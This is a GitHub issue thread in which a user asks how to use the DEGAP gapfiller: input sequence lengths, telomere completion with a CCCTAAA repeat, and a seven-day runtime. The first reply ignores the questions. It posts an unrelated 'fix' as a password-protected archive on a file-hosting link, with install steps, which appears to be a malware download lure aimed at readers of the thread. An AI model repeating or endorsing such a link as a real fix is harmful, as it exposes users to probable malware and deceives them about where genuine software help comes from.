### ISSUE TITLE
Inquiry about DEGAP GapFiller Usage and Parameters

### ISSUE THREAD

**Issue by ChuanzhengWei** [Jianwei-Zhang/DEGAP#2]
Hi,

I am currently utilizing the gapfiller feature of DEGAP to address gaps in sequence data and have several questions regarding its operation:

1. What is the recommended length for sequences in the --seqleft and --seqright input files?
2. In cases where a contig lacks a 5’ telomere, is it feasible to alter the left file to contain a repeat of CCCTAAA, use the contig for the right file, and set the flag to "right" to complete telomere assembly?
3. I am also concerned about the duration of software operations as one of my tasks has been running for seven days without completion.

Could you please provide guidance on these issues? Your expertise and advice will be greatly appreciated.
Thank you for your time and assistance.

Sincerely

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ChuanzhengWei** [comment]
@NikhilKumar77777 You probably answered #1？
